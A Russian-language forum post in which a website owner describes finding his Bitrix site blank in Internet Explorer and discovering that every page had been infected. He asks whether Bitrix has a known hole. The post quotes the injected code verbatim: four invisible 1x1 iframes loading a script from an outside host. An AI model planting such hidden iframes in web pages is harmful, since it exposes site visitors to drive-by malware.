Сегодня с утра обнаружил очень странную вещь. Началось все с того, что позвонил партнер и пожаловался на то, что наш сайт не грузится. Смотрю у себя в файрфоксе - все замечательно работает и я уже мысленно посылаю "тупого идиота с кривыми руками". Однако у меня появилось сомнение - я загружаю эксплорер и вуаля - пустой экран. Код страницы:
[CODE]<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=windows-1251"></HEAD>
<BODY></BODY></HTML>[/CODE]
Пытался разобраться минут 15, отключил все жава скрипты, счетчики - вообще, все что можно было бы отрубить. И тут случайно натыкаюсь в индексном файле, в самом конце вставлен код:
[CODE]<!-- ~ --><iframe src='http://takesnames.info/st/go.php?sid=' width=1 height=1 style='visibility: hidden;'></iframe>
<iframe src='http://takesnames.info/st/go.php?sid=1' width=1 height=1 style='visibility: hidden;'></iframe>
<iframe src='http://takesnames.info/st/go.php?sid=2' width=1 height=1 style='visibility: hidden;'></iframe>
<iframe src='http://takesnames.info/st/go.php?sid=3' width=1 height=1 style='visibility: hidden;'></iframe><!-- ~ -->[/CODE]
откуда он взялся - не знаю, сисадмин тоже не знает.
Поправил рутовый индексник - индексная страница заработала. Начал лазить по сайту - все остальные страницы заражены этим же кодом. Не знаю сколько раз я выразился матом, пока исправлял все это, но приличные слова я подобрать не могу.
Существуют ли какие-то проблемы с уязвимостью битрикса? Может какая-нибудь дыра открыта? Сам битрикс обновлен до последней версии, "новые обновления ядра недоступны".
урл сайта - [URL=http://www.iss.ru]ISS[/URL]